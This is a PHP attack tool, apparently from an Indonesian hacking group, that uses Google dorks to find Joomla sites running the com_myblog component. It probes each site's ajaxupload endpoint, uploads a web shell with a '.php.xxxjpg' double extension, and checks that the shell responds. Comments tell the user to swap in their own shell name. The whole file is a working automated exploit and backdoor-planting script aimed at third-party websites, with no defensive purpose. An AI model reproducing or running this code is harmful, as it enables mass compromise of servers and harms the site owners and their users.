com_myblog Auto Dorker+Xploiter | Mr. Error 404-IndoXploit

1. <?php
2.         set_time_limit(0);
3.         ini_set('memory_limit', '64M');
4.         header('Content-Type: text/html; charset=UTF-8');
5.        
6.         function letItBy() {
7.                 ob_flush();
8.                 flush();
9.         }
10.         function google_that($query, $page=1){
11.                 $resultPerPage=8;
12.                 $start = $page*$resultPerPage;
13.                 $url = "http://ajax.googleapis.com/ajax/services/search/web?v=1.0&hl=iw[&key=API_KEY_GOOGLE]&rsz={$resultPerPage}&start={$start}&q=" . urlencode($query); // you can delete this "[&key=API_KEY_GOOGLE]" if you haven't google API Key
14.         $resultFromGoogle = json_decode( http_get($url, true) ,true);
15.                 if(isset($resultFromGoogle['responseStatus'])) {
16.                         if($resultFromGoogle['responseStatus'] != '200') return false;
17.                         if(sizeof($resultFromGoogle['responseData']['results']) == 0) return false;
18.                         else return $resultFromGoogle['responseData']['results'];
19.                 } else
20.                         die('The function <b>' . __FUNCTION__ . '</b> Kill me :( <br>' . $url );
21.  
22.         }
23.         function http_get($url, $safemode = false){
24.                 if($safemode === true) sleep(1);
25.                 $im = curl_init($url);
26.                 curl_setopt($im, CURLOPT_RETURNTRANSFER, 1);
27.                 curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);
28.                 curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);
29.                 curl_setopt($im, CURLOPT_HEADER, 0);
30.                 return curl_exec($im);
31.                 curl_close();
32.         }
33.         function check_injection($url){
34.                 $data = http_get( str_replace("=com_myblog", "=com_myblog&task=ajaxupload", $url) );
35.                 return preg_match("/No file has been uploaded/", $data);
36.         }
37.         function cekshell($url) {
38.                 $d = curl_init($url);
39.                 curl_setopt($d, CURLOPT_RETURNTRANSFER, 1);
40.                 curl_setopt($d, CURLOPT_FOLLOWLOCATION, 1);
41.                 curl_setopt($d, CURLOPT_POST, 1);
42.                 return preg_match("/IndoXploit Auto Xploiter !!!|Mr. Error 404/", curl_exec($d)); // change this value "IndoXploit Auto Xploiter !!!|Mr. Error 404" to your hacker name or the name of your script/shell backdoor ex: "Hidden Uploader by Indonesian Hacker|Mr. Hacker"
43.                 curl_close($d);
44.         }
45. ?>
46. <!DOCTYPE html>
47. <style type="text/css">
48. a {
49.         text-decoration: none;
50.         color: green;
51. }
52. </style>
53. <form method="post">
54.                         Dork:
55.                         <input style="border: 1px dashed #000; background: transparent; color: #bb0000; padding-left: 5px;" type="text" id="dork" name="dork" value="inurl:/index.php?option=com_myblog" />
56.                         <input style="border: 1px dashed #000; background: transparent; color: #bb0000;" type="submit" value="Start" id="button"/>
57.                 </form>
58.                 <?php
59.                         if(isset($_POST['dork']{0})){
60.                                 echo "<hr width='50%' color='#008000'>";
61.                                 letItBy();                    
62.                                 for($googlePage = 1; $googlePage <= 10; $googlePage++){
63.                                         $googleResult = google_that($_POST['dork'], $googlePage);
64.                                         if(!$googleResult){
65.                                                 echo 'google dont have more result, so I done..(?)';
66.                                                 break;
67.                                         }
68.                                         for($victim = 0; $victim < sizeof($googleResult); $victim++) {
69.                                                 if(check_injection($googleResult[$victim]['unescapedUrl'])){
70.                                                 echo "<div style='margin: 5px auto; padding-left: 7px;'>";
71.                                                 $site = "http://".$googleResult[$victim]['visibleUrl']."/index.php?option=com_myblog&task=ajaxupload";
72.                                                 echo "[+] Scan : <font color=green> http://".$googleResult[$victim]['visibleUrl']."/</font><br>";
73.                                                 echo "[+] Ada Cuk!! => <a href='$site' target='_blank'> $site </a><br>";
74.                                                 echo "[?] Bntr ya , mau di anu dulu :p<br>";
75.                                                 $file = "gtg.php.xxxjpg"; // your name pf shell and the extension must .php.xxxjpg ex: "c99.php.xxxjpg"
76.                                                 $x = curl_init($site);
77.                                                           curl_setopt($x, CURLOPT_RETURNTRANSFER, 1);
78.                                                           curl_setopt($x, CURLOPT_POST, 1);
79.                                                           curl_setopt($x, CURLOPT_POSTFIELDS, array('fileToUpload'=>"@$file"));
80.                                                           $res = curl_exec($x);
81.                                                           preg_match("/source: '(.*?)'/", $res, $get);
82.                                                          $loc = $get[1];
83.                                                          if(preg_match("/uploaded successfully|File exists|successfully uploaded|File with similar name already exist/", $res)) {
84.                                                                 echo "[+] <font color=green>Wih Hoki bener lu cok !! Sukses di anu => <a href='$loc' target='_blank'> $loc </a> <==</font>","<br>";
85.                                                                 if(cekshell($loc)) {
86.                                                                         echo "[+] <font color=green>Shell OK!! </font><br>";
87.                                                                 } else {
88.                                                                         echo "[-] <font color=red>Shell Error!! </font><br>";
89.                                                                 }
90.                                                          } else {
91.                                                                 echo "[-] <font color=red>Yah Gagal Di Anu cok xixixi :p</font><br>";
92.                                                                 }
93.                                                          echo "</div>";
94.                                                           curl_close($x);
95.                                                 }
96.                                                 else echo "<div style='margin: 5px auto; padding-left: 7px;'>";
97.                                                 echo "[+] Scan : <font color=green> http://".$googleResult[$victim]['visibleUrl']."/</font><br>";
98.                                                 echo "[-] <font color=red>Ga nemu cuk! </font><br>";
99.                                                 echo "</div>";
100.                                                 letItBy();
101.                                         }
102.                                 }
103.                         }
104.                 ?>
105.                 </div>
106.         </body>
107. </html>